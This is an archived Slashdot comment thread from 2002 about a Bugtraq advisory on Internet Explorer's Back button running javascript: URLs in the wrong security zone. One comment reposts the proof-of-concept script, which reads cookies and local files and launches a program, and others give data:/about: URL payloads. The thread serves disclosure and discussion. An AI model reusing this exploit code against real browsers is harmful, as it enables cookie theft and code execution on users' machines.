Slashdot Mirror


Don't Hit That Back Button

Saint Aardvark writes: "From the Bugtraq mailing list comes this warning: 'Using the Back Button in IE is dangerous'. When hitting the back button, javascript links will be executed in the security zone of the last url viewed. Proof-of-concept included in the warning will execute minesweeper or read your Google cookies."

29 of 640 comments

  1. Test it out if you have IE by ekrout · · Score: 5, Informative

    I copied the source from the (now Slashdotted) page and created an HTML file at http://www.eg.bucknell.edu/~ekrout/IE_Hack.html for those of you with IE to test it out. If you want, reply to this post and let everyone know if it works with your browser, Windows version, etc.

    This is a very troubling security hole for Windows users who prefer IE (99.7% of them).

    Founder, monolinux

    --

    If you celebrate Xmas, befriend me (538
    1. Re:Test it out if you have IE by CmdrSanity · · Score: 2, Informative

      McAfee stopped it cold.

    2. Re:Test it out if you have IE by Anonymous Coward · · Score: 1, Informative

      Doesn't work with patched IE 4.0 with all the patches and normal security settings :)

      Doesn't work on Netscape 4.79 either! :P

    3. Re:Test it out if you have IE by sconeu · · Score: 3, Informative

      I have the patch for MS02-015 (Q319182) installed, and Minesweeper fired up.

      --
      General Relativity: Space-time tells matter where to go; Matter tells space-time what shape to be.
    4. Re:Test it out if you have IE by SomeGuyFromCA · · Score: 3, Informative

      it still worked even after I changed the default security level for Local Intranet to High

      That's because this doesn't work off local intranet, it works off local hard drive; files on your hard drive are automatically run without safeties, and MICROS~1 does not offer any option to change this.

      --
      if the answer isn't violence, neither is your silence / freedom of expression doesn't make it alright
    5. Re:Test it out if you have IE by greenrd · · Score: 2, Informative
      Actually, there is a registry hack to enable security configuration for "My Computer". But it's so annoying I wouldn't recommend it. As you browse around your HD in explorer it keeps warning you about ActiveX controls (i.e. explorer's built-in file displaying stuff). It's stupid.

    6. Re:Test it out if you have IE by Alsee · · Score: 3, Informative

      TESTED AND VERIFIED UNDER GAMESPY ARCADE

      This vulnerability affects applications which integrate IE functionality!

      Gamespy "GameSpy Arcade is the #1 online gaming service... Support for over 300 of the leading games and demos".

      -

      --
      - - You can't take something off the Internet! That's like trying to take pee out of a swimming pool.
  2. Already tagged as virus by McAfee by Anonymous Coward · · Score: 1, Informative

    I copied the HTML onto my webserver deliberately, and tried it out -- the exploit worked as expected EXCEPT when my virus scanner was on. Then I couldn't even save the web page when I copied the text to it. So a virus scanner prevents an IE bug? Weird.

  3. Re:Java's been crashing IE of late by asv108 · · Score: 5, Informative
    Java is insecure

    I think you're referring to JavaScript, originally called LiveScript by Netscape before the Java buzz hit. JavaScript has nothing to do with Java. Java is relatively secure by most standards.

  4. RTFE (exploit) by gartogg · · Score: 5, Informative

    If you read the exploit, you would see why this would not be possible.

    You do not need to actually press the button, but you need to do it from a trusted page.

    --
    I'm a conscientious .sig objector.
  5. If MS had acted... any number of times... by Wee · · Score: 5, Informative
    If they had waited til tomorrow, they'd have known about M$'s fix for this dangerous security hole.

    If MS had responded back in November when he made the sploit known, or if they had even thought once about security when designing IE, or if they had any kind of decent security model in the OS, or, or, or... then this never would have happened in the first place and MS wouldn't have to patch the barn door after the horse had left. But don't blame the guy who discovered this by trotting out that "don't tell anyone about the security hole until the vendor can fix it" pablum. Security through obscurity isn't, especially when that obscurity is driven by the needs of the marketing group.

    You find a hole, you do due diligence, they don't respond (he gave them months to fix it fer cryin' out loud), you publish. Then, most likely, the vendor publishes a fix based on the real needs of users and not the perceived needs of some business unit looking at a bottom line.

    It boggles my mind that one could have a machine rooted simply by browsing the web. A die-hard MS nut at work today was giving me grief over the fact that Red Hat has "published" 500MB of "updates" to "Linux" since version 6.2 and how could the OS be so insecure as to need that many updates... I didn't even have the energy to respond. And I'm all for people running with whatever works for them, but at least I know for a fact that Opera on my machine runs in userland and won't get me rooted. And hopefully, using your favorite browser won't mean data loss and/or a re-image of the OS as well.

    But to blame the guy who discovered it? I mean, honestly, for fsck's sake: we're talking about a web browser, you know? Completely compromising a machine via a back button? And it's been known for five months?!? At least MS could tell users to run another browser until they can fix the issue. Or turn scripting off. Or whatever. The fact that it could happen in the first place is just obscene. Or criminal. MS leaves a bad taste in my mind sometimes...

    -B

    --

    Ash and Hickory, straight-grained and true, make excellent bludgeons, dandy for the cudgeling of vegetarians.

  6. I wouldn't hedge my bets on Mozilla so blindly. by Starship+Trooper · · Score: 2, Informative
    Mozilla has its share of problems too; it's just that the media is so busy fawning over the bleeding-heart "David vs. Goliath" vision of Mozilla (much like that given to Linux in the old IPO rush days) to highlight these troubles. One particularly nasty problem Mozilla has is the ability to encode arbitrary data into a URL starting with "data:". This misfeature alone is enough for me to keep Mozilla off all my high-security computer systems until the project decides to either a) remove this "feature" as the debugging relic it is or b) add a preference to disable it, like Javascript or animated images.

    For those not aware of this problem, here's a synopsis. Mozilla will parse a URL of the form "data:content/type;encoding,rawdata" and treat it as a file of the type given. For example, the URL "data:text/html;identity,<meta http-equiv="refresh" content="0;http://www.google.com/">" will create an HTML page that will immediately shunt you to google.com. Open up Mozilla and paste that URL in if you don't believe me. Using an encoding type of "base64", images, data files and even executables can be hidden inside a URL. Trolls have already exploited this numerous times for mundane things like embedding goatse.cx links; imagine if some malicious hacker were to design a page with a trojan .exe or shellscript embedded in an innocuous-looking URL!

    While "data:" URLs can be filtered out with Proxomitron or avoided by careful scanning of the status bar before clicking any link, I think such a glaringly wide target for abuse doesn't belong in any project past the alpha-test stage, much less one that is getting ready to make a highly-publicised 1.0 release in the upcoming weeks. Until this hole is patched, I would recommend Konqueror to you. It no longer "crash[es] constantly anyway", as you put it; the 3.0 release is incredibly stable, supports made-for-IE sites much better than Moz, and also has more than adequate standards support. I would suggest rethinking your Mozilla deployment strategy and giving Konq another go.

    --
    Loneliness is a power that we possess to give or take away forever
    1. Re:I wouldn't hedge my bets on Mozilla so blindly. by _bobs.pizza_ · · Score: 2, Informative
      Try using the same thing with IE, using about: instead....
      about:text/html;identity,<meta http-equiv="refresh" content="0;http://www.google.com/">
      That just loops forever, refreshing the page, but you can put any valid HTML/JavaScript/VBScript code that you want in that and it does it.

      This code is kept in the Internet Zone, so you can't be as malicious as you'd like. It does make an HTML page w/ whatever you put.
  7. Re:What are the odds... by SaDan · · Score: 5, Informative
    Read the Bugtraq submission!

    Title: Using the backbutton in IE is dangerous.
    Date: [2002-04-15]
    Software: At least Internet Explorer 6.0.
    Tested env: Windows 2000 pro, XP.
    Rating: Medium because user interaction is needed.
    Impact: Read cookies/local files and execute code
    (triggered when user hits the back button).
    Patch: None.
    Vendor: Microsoft contacted 12 Nov 2001, additional
    information given 25 Mar 2002.
    Workaround: Disable active scripting or never
    use the back button.
    Author: Andreas Sandblad, sandblad@acc.umu.se
    MS was notified late last year... Just over five months ago.

    Read, people... Read, then make comments. It's not that difficult.

  8. Re:On a (somewhat) related topic... by psocccer · · Score: 2, Informative

    I agree the back button thing can be irritating, but sometimes you can't really work around it, e.g. if the page is dynamic and the data can change and the back button can become a data-integrity nightmare. Sure it can help to use transaction ID's and make sure nothing happens twice, but it's annoying to me as a web developer. Sometimes I wish there never was a back button.

    For a concrete example of problems w/ the back button, check out acmemail. It's a cool webmail client, uses perl and pop3, but if a user clicks back, usually after reading a message and wanting to get back to the message list, it will cause strange problems and eventually auto-log them out. It took a long time to teach the outside sales staff at work that you just need to click the "inbox" button instead of back, and to this day every time there is a meeting they mention that webmail is broken, then I check it out, find out they're using back, and explain the solution. Then the next meeting comes and it's square one all over again...

  9. Change the hand cursor-shape in 9x's Control Panel by yerricde · · Score: 2, Informative

    I want Mozilla to give me the netscape finger.

    Mozilla gives you the system finger cursor-shape when you :hover over a link. If you want Mozilla to give you the Netscape finger, or even the middle finger, you can select any .cur file in Start > Settings > Control Panel > Mouse > Pointers.

    --
    Will I retire or break 10K?
  10. First LiveScript, then JavaScript, then ECMAScript by yerricde · · Score: 3, Informative

    I think you're referring to ECMAScript formerly called JavaScript

    First it was LiveScript, then when "Java" became a buzzword, Netscape changed its syntax to resemble that of a brace language (C, Perl, or the Java programming language) and changed its name to JavaScript. "ECMAScript" is the generic name, created when the underlying language (without any specific DOM) was submitted to the European standards body ECMA; "JavaScript" is Sun's trademark licensed to Netscape, reflected in the media type for ECMAScript source code (text/javascript).

    --
    Will I retire or break 10K?
  11. Re:A complete list by jesser · · Score: 4, Informative

    I wouldn't call this a "dumb ass bug". It's subtle, and finding it requires being aware of several things and thinking to combine them:

    * javascript: URLs run in the security domain of the page from which they originate. (Or, if they're stored in the user's bookmarks, they run as part of the current page, letting them do cool things like show the HTML source of the selection.)

    * If a javascript: URL returns a non-null value, it acts like a data: URL. For example, javascript:1+2;3+4 is equivalent to data:text/html,7. (Most of the time, this is just an annoyance, forcing you to put "void 0" at the end of a javascript: URL unless you're sure that the last calculation always returns null.)

    * It is possible to go "forward" from a javascript: URL.

    * The Back button incorrectly runs a javascript: URL in the security domain and context of the current page instead of running it with no context or with the context of the page that put the URL in session history.

    The fact that the bug was present in both IE and Mozilla until Mozilla 0.9.3 is strong evidence that the hole is not an obvious "dumb ass bug". I only discovered the hole because I make bookmarklets (javascript: URLs) in my free time and was being paid by Netscape to work on Mozilla security last summer.

    --
    The shareholder is always right.
  12. One reason I love Opera by Arker · · Score: 5, Informative

    Opera cured that problem quite effectively. Since I started using it as my main browser, I can't remember finding a page where back wouldn't work properly. It ignores scripts that try to take it over, and it tracks documents-in-frames properly too, you can go forward and back independently in different frames on framed pages.

    --
    =-=-=-=-=-=-=-=-=-=-=-=-=-=-
    Friends don't let friends enable ecmascript.
  13. This is a major one ,, user interaction not needed by rahul_inblue · · Score: 5, Informative

    The flaw can be exploited *without* user interaction ,, use about: and use a body-onload javascript to execute the back button ,, poc html page is attached. u know what this means :P .

    ----cut here---

    Press link and then the backbutton to trigger script.

    Run Minesweeper (c:/winnt/system32/calc.exe Win2000 pro)


    Run Minesweeper (c:/windows/system32/calc.exe XP, ME etc...)


    Read c:\test.txt (needs to be created)


    Read Google cookie

    // badUrl = "http://www.nonexistingdomain.se"; // Use if not XP
    badUrl = "about: ";
    function execFile(file){
    alert (badUrl);

    s = '';
    backBug(badUrl,s);
    }
    function readFile(file){
    s = '';
    backBug(badUrl,s);
    }
    function readCookie(url){
    s = 'alert(document.cookie);close();';
    backBug(url,s);
    }
    function backBug(url,payload){
    len = history.length;
    page = document.location;
    s = "javascript:if (history.length!="+len+") {";
    s+= "open('javascript:document.write(\""+payload+"\")' )";
    s+= ";history.back();} else 'location=\""+url
    s+= "\";document.title=\""+page+"\";';";
    location = s;
    }

    ---cut here---

    --
    _
  14. Re:hm by Kanon · · Score: 4, Informative
    2) I can disable the pop-under ads on sites I frequent by putting those sites into the "restricted" zone. Mozilla offers me no way to disable the popunders without completely disabling Javascript. (I'd rather have an option for "disable all javascript based popups", but at least IE gives me SOMETHING.)

    Get a newer version of Mozilla and go into preferences/advanced/scripts and windows.

    Turn off the "open unrequested windows" tickbox. Bingo. You now have to click a link before the popup/under will open. Sites can't open them for you.

  15. Stupid is as stupid does. by BCTECH · · Score: 3, Informative

    I have not seen a popup ad in years. I was not vulnerable to the .eml bugs. I laugh at websites that are blank for people like me who have java script turned off. I have always thought that Java Script, captive X etc were the scourge of the internet.

    Ever since we have had the option I have used the built in security functions of IE. Tools/Internet Options/Security

    Turn off everything for your internet zone. Add all your sites that you visit regularly to "Trusted Sites" and enable all the bells and whistles you want.

    If a site breaks because they have not done simple checks to see if you have java script enabled then screw them and move on to a site that is run by someone who has an element of style and thoroughness.

    Here is a wish list I do have for IE though. One power tool I have allows you to toggle images on and off with a click . I would like such a power tool that would enable/disable java script with a click and another to add trusted zones on the fly. If anyone out there has the coding capability I think you may have something.

    1. Re:Stupid is as stupid does. by leighklotz · · Score: 3, Informative

      Unfortunately, you are vulnerable to this one.

      The insidious thing about this bug is that it breaks your security model. When you press back, the page you go back to is run in the security zone of the page you go back from. So, even if you block "everything" in the "Internet Zone" site, if the next page you visit is in your trusted zone and you press the back button, it will run ActiveX controls or pop up or whatever bells and whistles are allowed on the page you came from.

      Furthermore, note that Internet Explorer error pages (such as a 404 Page Not Found) are automatically in the trusted zone. So, for you to be safe with your current policy, you need to do the following as well:

      1. Avoid the back button from trusted pages
      2. Don't click on broken links or anything else that gets an error page
  16. Re:Is there a real exploit here? by phyxeld · · Score: 3, Informative

    Look at the exploit code.

    See how the script calls an alert() with the contents of a local file from your drive? That's very very bad.

    If a remote script can read a file off your hard drive, it can then write bits of data into an img tag on the page, passing your stolen information to a remote server (via the image's src element) without your knowledge. Very very bad.

    --
    __
    Choose mnemonic identifiers. If you can't remember what mnemonic means, you've got a problem. - Larry Wall
  17. Re:yay for NAI by Tryfen · · Score: 2, Informative

    However, because it is not usually possible to clean or delete the offending page, it is possible to get the code to run.

    --
    If a square is really a rhombus, why aren't all triangles purple?
  18. Re:hm by shakah · · Score: 2, Informative

    This isn't quite the same thing, but you can block individual sites from popping up windows on entry to the site by putting something like the following in your preferences file (user.js):

    user_pref("capability.policy.popupsites.sites", "http://www.morningstar.com/") ;
    user_pref("capability.policy.popupsites.Window.open","noAccess") ;
    user_pref("dom.disable_open_during_load", true) ;

  19. Re:Go Mozilla! by rapid+prototype · · Score: 2, Informative

    yeah... those genius open-source guru types who know how to close an HTML tag...

    -rp

  20. MS patch for this already released March 29 2001?? by badzilla · · Score: 2, Informative

    I tried the various POC HTML pieces in this thread and they all trigger my antivirus (F-secure) which sends me off to get Microsoft Security Bulletin MS01-20

    This bulletin does not seem to me to have any relevance to the scripting problem we're talking about. However, the exploit does not work on my version of IE6, even if I tell F-secure to ignore the alert.

    --
    "Don't belong. Never join. Think for yourself. Peace." V.Stone, Microsoft Corporation
  21. The exploit works with IE 5.5 by Anonymous Coward · · Score: 1, Informative

    I just tried the exploit on IE 5.5 (running on Windows 2000). The exploit works!

    Nothing like a little backward compatibility.